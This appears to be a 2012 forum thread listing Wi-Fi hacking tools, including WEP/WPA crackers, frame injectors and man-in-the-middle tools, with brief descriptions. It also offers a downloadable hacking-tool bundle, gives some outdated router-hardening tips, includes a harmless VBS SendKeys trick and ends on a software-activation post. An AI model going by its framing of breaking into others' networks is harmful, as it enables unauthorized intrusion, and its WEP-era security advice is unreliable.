    Wireshark Wi-Fi hacking tool not only allows hackers to find out all available wireless networks, but also keeps the connection active and helps the hacker to sniff the data flowing through the network.

    You can use WireShark to capture network packets and to display that packet data as detailed as possible. It also helps in examining HTTP Requests, Cookies, Forms, TCP Requests, Ping Requests and responses etc.
    AirSnort

    [​IMG]

    Most Wi-Fi hacking tools work only when there is no encrypted security settings. While NetStumblr and Kismet fail to work if there is a wireless encyption security being used, AirSnort works like a charm and does the magic here.
    All other functionality remains same, but AirSnort is used by hackers to hack into a Wi-Fi hotspot with more tight security measures.
    CowPatty

    [​IMG]

    CowPatty is an another Wi-Fi network hacking tool that has crack got a WPA-PSK protection feature and using this hackers can even break into more secure Wi-Fi environments.
    CowPatty actually tries a bunch of different options from a dictionary file and checks if it matches with a defined pre-shared key. Below is the demo video on the way it works.

    Secure Wi-Fi Networks from Hackers

    With the release of advanced Wi-Fi hacking tools and methods, it’s practically impossible to keep your Wi-Fi hostpot secure
    from the evil eyes. However, you can always use the followings steps to minimize the chances of hackers hacking into your Wi-Fi network.
    1. Have a MAC level filtering at your router.
    2. Change the default settings (user ID, password, Access point, etc) of your router.
    3. Encrypt and do not broadcast your SSID.
    4. If you use WEP, use a 128-bit, not a 40-bit WEP encryption key. 128 bit key would take longer to crack. If your wireless router supports it , use WPA or WPA2 instead of WEP. WPA / WPA2 is much secure as compared to WEP.
    5.) Use a long and complex WPA Pre-Shared Key (use random letters, digits and symbols). This type of key would have less of a chance of residing in a dictionary file that would be used to try and guess your key and/or would take longer.
    6.) Ensure that you send your login data using HTTPS. Traffic sent over the HTTPS protocol is encrypted, therefore anyone sniffing packets over the network will get garbled text and nothing else.

    @
    gfsonwin


     
    Last edited by a moderator: Jan 4, 2016
  16. MziziMkavu

    MziziMkavu JF-Expert Member

    #16
    May 28, 2012
    Joined: Feb 3, 2009
    Messages: 38,760
    Likes Received: 3,104
    Trophy Points: 280
    [TABLE="width: 100%, align: left"]
    [TR]
    [TD="bgcolor: #ffffff, colspan: 3"]
    [SIZE=+1]Recon and Attack tools[/SIZE]
    [/TD]
    [/TR]
    [TR]
    [TD="colspan: 3"][SIZE=-1]DISCLAIMER[/SIZE]
    [SIZE=-1]Here is the list of tools we commonly use in pentesting wireless networks or just wardriving for fun and no profit. All these tools are covered in the book in sufficient details. Some of them may become obsolete at the time the book

    hits the shelf and so are not possible to find anywhere anymore, so they are located on our site. The reason for it is the dialectic approach we endorse: to understand things as they are now, you are ought to know where did they

    come from and how did they develop. Besides, you may find the snippets of code from these tools to be useful for your own projects.[/SIZE]

    [SIZE=-1]
    As to the code, everything on our list is Open Source and is distributed under GPL, BSD or similar licenses. Close Source tools are not included on purpose, even though they may be mentioned in the book where appropriate. This

    work is not commercial, does not favour particular vendors, and has only became possible due to the work and collaboration within the Open Source community. We are profoundly grateful to the authors of the listed tools for the feats of wonder they performed to make "theoretical" wireless security practical.[/SIZE]

    [SIZE=-1]If you think we have missed on something that should be included in that list please e-mail authors at wifoo@arhont.com[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="bgcolor: #cccccc, colspan: 3"]
    Wireless Network Discovery, Mapping and Traffic Analysis - [SIZE=-1]the "classical" wardriving tools for discovering wireless LANs, positioning them on the map, sniffing, logging and analyzing packets in the air[/SIZE].
    [/TD]
    [/TR]
    [TR]
    [TD="width: 250"][SIZE=-1]AirFart[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD="width: 246"][SIZE=-1]v 0.2.1[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250"][SIZE=-1]AirTraf[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 1.1[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250"][SIZE=-1]Aphunter[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250"][SIZE=-1]APradar[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.52[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250"][SIZE=-1]BSD-airtools (dstumbler)[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.2[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250"][SIZE=-1]Classic Stumbler (mac)[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 1.7[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250"][SIZE=-1]Gtkskan[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.2[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250"][SIZE=-1]HermesAP monitor patch[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250"][SIZE=-1]iStumbler (mac)[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 96[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250"][SIZE=-1]KisMAC (mac)[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v R65[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250"][SIZE=-1]Kismet[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 2005-08-R1[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250"][SIZE=-1]Kismet Log Viewer[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.9.7[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250"][SIZE=-1]Kismet parse[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.2[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250"][SIZE=-1]MacStumbler (mac)[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 075b[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250"][SIZE=-1]Mognet[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 1.16[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250"][SIZE=-1]Perlskan[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.1[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250"][SIZE=-1]Prismdump[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 20001122[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250"][SIZE=-1]Prismstumbler[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.7.3[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250"][SIZE=-1]Prismsnort[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 2.0[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250"][SIZE=-1]SSIDsniff[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.42[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250"][SIZE=-1]THC-Wardrive[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 2.3[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250"][SIZE=-1]WaveStumbler[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 1.2.0[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250"][SIZE=-1]Wellenreiter[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 1.9[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250"][SIZE=-1]Wellenreiter for OPIE[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]not mirrored[/SIZE][/TD]
    [TD][SIZE=-1]v 1.0RC2[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250"][SIZE=-1]Wi-Find[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.2.1[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250"][SIZE=-1]WifiScanner[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v1.0.2[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250"][SIZE=-1]Wispy-Tools[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 2006-01-R1[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250"][SIZE=-1]Wistumbler[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250"][SIZE=-1]Wlan-scan[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.0.1[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250"][/TD]
    [TD="width: 150"][/TD]
    [TD][/TD]
    [/TR]
    [TR]
    [TD="bgcolor: #cccccc, colspan: 3"]Client evaluation tools - [SIZE=-1]utilities to check security state of wireless clients.[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]Airsnarf Rogue Squadron
    [/SIZE]
    [/TD]
    [TD="width: 150"][SIZE=-2]Local mirror
    [/SIZE]
    [/TD]
    [TD][SIZE=-1]v 0.1[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]Hotspotter[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.4[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]Probemapper[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.5[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="bgcolor: #ffffff"][SIZE=-1]Karma Tools[/SIZE][/TD]
    [TD][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.4[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="bgcolor: #ffffff"][SIZE=-1]Wlan-webauth[/SIZE][/TD]
    [TD][SIZE=-2]Not mirrored[/SIZE][/TD]
    [TD][SIZE=-1]
    [/SIZE]
    [/TD]
    [/TR]
    [TR]
    [TD="width: 250"][/TD]
    [TD="width: 150"][/TD]
    [TD][/TD]
    [/TR]
    [TR]
    [TD="bgcolor: #cccccc, colspan: 3"]RF signal strength monitoring - [SIZE=-1]utilities for monitoring the signal strengh of the WLAN you are associated to.[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]Wavemon[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.4.0b[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]Wireless Power Meter[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.00[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="bgcolor: #ffffff"][SIZE=-1]Wscan[/SIZE][/TD]
    [TD][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 1.00[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="bgcolor: #ffffff"][SIZE=-1]Wscan (familiar/linux/ipaq)
    [/SIZE]
    [/TD]
    [TD][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 1.00[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]Wscan (BSD)[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 2.00experimental[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]XnetworkStrength[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.4.2[/SIZE][/TD]
    [/TR]
    [/TABLE]
     
  17. MziziMkavu

    MziziMkavu JF-Expert Member

    #17
    May 28, 2012
    Joined: Feb 3, 2009
    Messages: 38,760
    Likes Received: 3,104
    Trophy Points: 280
    [TABLE="width: 100%, align: left"]
    [TR]
    [TD="bgcolor: #cccccc, colspan: 3"]Wireless-specific encryption cracking - [SIZE=-1]tools for gaining access to protected wireless networks. At the moment include WEP crackers, WEP-encrypted traffic injectors and practical implementations of attacks against certain 802.1x types.[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]Airsnort[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.2.7e[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="bgcolor: #ffffff"][SIZE=-1]Aircrack[/SIZE][/TD]
    [TD][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 2.41[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]Asleap[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 1.4[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]BSD-airtools (dwepcrack)[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.2[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]coWPArty[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 2.0[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]Leap[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]anwrap (Leapcrack)[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.1[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]LucentRegCrypto[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.3[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="bgcolor: #ffffff"][SIZE=-1]THC-LEAPcracker[/SIZE][/TD]
    [TD][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.1[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]weplab[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.1.5[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]WEP_Tools[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]WepAttack[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.1.3[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]WepDecrypt[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.7[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]WEPcrack[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.1.0[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]WEPWedgie[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.1.0[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]Wnet (reinj)[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]WPA Cracker[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.1[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][/TD]
    [TD="width: 150"][/TD]
    [TD][/TD]
    [/TR]
    [TR]
    [TD="bgcolor: #cccccc, colspan: 3"]Wireless custom frame generation - [SIZE=-1]these allow layer two attacks on wireless LANs including a variety of man-in-the-middle attacks and unstoppable denial of service.[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]AirJack26[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.1a[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]AirJack[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.6.6b[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="bgcolor: #ffffff"][SIZE=-1]chopchop[/SIZE][/TD]
    [TD][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.1[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="bgcolor: #ffffff"][SIZE=-1]Dissassociate[/SIZE][/TD]
    [TD][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]FakeAP[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.3.2[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]FakeAP BSD[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.3.1[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]FataJack[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250"][SIZE=-1]File2Air[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.1[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]Libradiate[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.02[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]Libwlan[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.1[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]Omerta[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]Wifitap[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.2.0[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]Void11[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.2.0[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]Wnet (dinject)[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][/TD]
    [TD="width: 150"][/TD]
    [TD][/TD]
    [/TR]
    [TR]
    [TD="bgcolor: #cccccc, colspan: 3"]Miscellaneous - [SIZE=-1]difficult-to-categorise software that comes handy in wireless penetration testing.[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]Applewepkey[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]Airpwn[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.50c[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]Airsnarf[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.2[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]Auditor Security Collection[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]not mirrored[/SIZE][/TD]
    [TD][SIZE=-1]v 200605-02[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]AP-utils[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 1.5[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]ApHopper[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.3[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]APTools[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.1.0[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]DMZS-carte[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.9rc1[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]Ethereal/Tetheral[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]not mirrored[/SIZE][/TD]
    [TD][SIZE=-1]v 0.10.14[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]Ettercap[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v NG-0.7.3[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]Gpsd[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 2.31[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]Gpsdrive[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 2.10pre2[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]Orinoco MM Patch[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]not mirrored[/SIZE][/TD]
    [TD][SIZE=-1]v[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]Macfld.pl[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]Morinoco Patch[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 14.2[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]Packetyzer[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]not mirrored[/SIZE][/TD]
    [TD][SIZE=-1]v 4.03[/SIZE][/TD]
    [/TR]
    [TR]
    [TD="width: 250, bgcolor: #ffffff"][SIZE=-1]Wifi2eth[/SIZE][/TD]
    [TD="width: 150"][SIZE=-2]Local mirror[/SIZE][/TD]
    [TD][SIZE=-1]v 0.10[/SIZE][/TD]
    [/TR]
    [/TABLE]
     
  18. MziziMkavu

    MziziMkavu JF-Expert Member

    #18
    May 28, 2012
    Joined: Feb 3, 2009
    Messages: 38,760
    Likes Received: 3,104
    Trophy Points: 280
    27 BEST WIFI HACK TOOLS



    Hacks page 1:
    - Comm View for WiFi v5.2484
    - Pure [COLOR=#00CCFF !important]NetWork Magic 2

    - Air
    - AP Sniff
    - Comm View
    - Aerosol
    - Easy WiFi Radar
    - Boingo Wireless
    - and more[COLOR=#00CCFF !important] ....[/COLOR]

    Hacks page 2:
    - Get Wep Key Of Encrypted Wireless Connection[COLOR=#00CCFF !important][/COLOR]
    - WiFi Companion v2.10.4
    - Net Stumbler
    - WiFi Hack Tools
    - WiFi Internet Access Blocker
    - iPig WiFi HotSpot [COLOR=#00CCFF !important]VPN Security[/COLOR]

    Hacks page 3:
    - Hot Spotter v0.4
    - Kismet
    - WDG
    - AirShort v0.2.7e
    - WiFi Hopper v1.2
    - Wireless NetWork Ignition
    - Wepwedgie - alpha
    - Wep #####

    Plus e-Books:
    - O-Reilly Wireless Hacks
    - System #####ing 2k
    - FBI Teaches how to break WiFi
    - Collection of Hacking Dictionary
    - How to ##### WEP





    [​IMG][​IMG]

    Download Link :


    WiFiHTools.rar


    enjoy wifi hacking tools..........
    [/COLOR]
     
  19. MziziMkavu

    MziziMkavu JF-Expert Member

    #19
    May 28, 2012
    Joined: Feb 3, 2009
    Messages: 38,760
    Likes Received: 3,104
    Trophy Points: 280
    How to Write the Text automatically in Notepad



    Today I will show you " How to Write the Text automatically in Notepad" .
    This is a really an Awesome Trick. You really enjoy it...
    You can show Your Friends and say that My Notepad Writes Automatically.. So Read On..



    STEPS:
    1. Open the Notepad and Type the Code Given Below.



    set wshshell = wscript.CreateObject("wscript.shell")
    wshshell.run "Notepad"
    wscript.sleep 2000
    wshshell.AppActivate "Notepad"
    WshShell.SendKeys "Thanx"
    WScript.Sleep 500
    WshShell.SendKeys " "
    WScript.Sleep 500
    WshShell.SendKeys "for"
    WScript.Sleep 500
    WshShell.SendKeys " "
    WScript.Sleep 500
    WshShell.SendKeys "the"
    WScript.Sleep 500
    WshShell.SendKeys " "
    WScript.Sleep 500
    WshShell.SendKeys "visit"
    WScript.Sleep 500
    WshShell.SendKeys " "
    WScript.Sleep 500
    WshShell.SendKeys "richeshah.blogspot.in"



    2. Save it as anyname.vbs (Note the vbs extension)

    3. Now Open the anyname.vbs file by doublecliking on it and see the Magic..

    [​IMG]

    Note: Wscript.Sleep 500 is for delay (delay that you want to introduce between writing words)
    and
    WshShell.SendKeys " Any Text that you Want to Display"...
    Enjoy
     
  20. MziziMkavu

    MziziMkavu JF-Expert Member

    #20
    May 28, 2012
    Joined: Feb 3, 2009
    Messages: 38,760
    Likes Received: 3,104
    Trophy Points: 280
    Kaspersky World 1.3.2 For Kaspersky Activation




